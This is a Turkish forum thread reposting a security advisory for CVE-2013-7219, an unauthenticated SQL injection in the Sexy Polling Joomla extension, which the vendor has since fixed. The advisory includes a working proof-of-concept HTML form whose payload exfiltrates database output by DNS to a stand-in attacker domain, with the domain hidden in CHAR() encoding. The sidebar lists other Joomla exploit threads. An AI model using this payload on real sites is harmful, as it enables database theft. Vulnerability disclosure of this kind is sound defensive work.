Konuyu Oyla:
  • Derecelendirme: 2/5 - 3 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Sexy Polling Joomla Extension SQL Injection
#1

Advisory ID: HTB23193
Product: Sexy Polling Joomla Extension
Vendor: 2GLux
Vulnerable Version(s): 1.0.8 and probably prior
Tested Version: 1.0.8
Advisory Publication: December 26, 2013 [without technical details]
Vendor Notification: December 26, 2013
Vendor Patch: January 8, 2014
Public Disclosure: January 16, 2014
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2013-7219
Risk Level: High
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/CTongue/ITongue/ATongue)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )


------------------------------------------------------------------------
-----------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in Sexy Polling Joomla Extension, which can be exploited to perform SQL Injection attacks.

1) SQL Injection in Sexy Polling Joomla Extension: CVE-2013-7219

The vulnerability exists due to insufficient validation of "answer_id[]" HTTP POST parameter passed to "/components/com_sexypolling/vote.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.

The following exploitation example is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):


Kod:
<form action="http://[host]/components/com_sexypolling/vote.php"
method="post" name="main">
<input type="hidden" name="answer_id[]" value="',(select load_file(CONCAT(CHAR(92),CHAR(92),(select
version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(
107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),
CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))),'','','',''
,'')
-- ">
<input type="submit" id="btn">
</form>
Beğenenler:
#2
Eline sağlık exciting
İnsɑnlɑr değişmez değişen tek şey şɑrtlɑr ve çıkɑrlɑr...
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Joomla Com_Cckjseblod Auto Exploiter FTP Config İndirme Exploit KingSkrupellos 12 235 01-12-2016, Saat: 08:35
Son Yorum: the_zizil
  Joomla Upload 1.0 H4Sec 40 1,872 22-11-2016, Saat: 19:27
Son Yorum: Efetimi
  Joomla Com_AdsManager Auto Exploiter PerL PHP Kodu KingSkrupellos 5 183 22-11-2016, Saat: 00:37
Son Yorum: Trajedi
  Joomla Com_MyBlog Rasgele Dosya Yükleme Açığı KingSkrupellos 13 316 21-11-2016, Saat: 01:19
Son Yorum: 0xfans
  Joomla Exploitler Zaafiyetlerin İsimleri - 2006 & 2015 KingSkrupellos 8 450 04-11-2016, Saat: 17:40
Son Yorum: Kolonkun
Anahtar Kelimeler

Sexy Polling Joomla Extension SQL Injection indir, Sexy Polling Joomla Extension SQL Injection Videosu, Sexy Polling Joomla Extension SQL Injection Online izle, Sexy Polling Joomla Extension SQL Injection Bedava indir, Sexy Polling Joomla Extension SQL Injection Yükle, Sexy Polling Joomla Extension SQL Injection Hakkında, Sexy Polling Joomla Extension SQL Injection Nedir, Sexy Polling Joomla Extension SQL Injection Free indir, Sexy Polling Joomla Extension SQL Injection Oyunu, Sexy Polling Joomla Extension SQL Injection Download


1 Ziyaretçi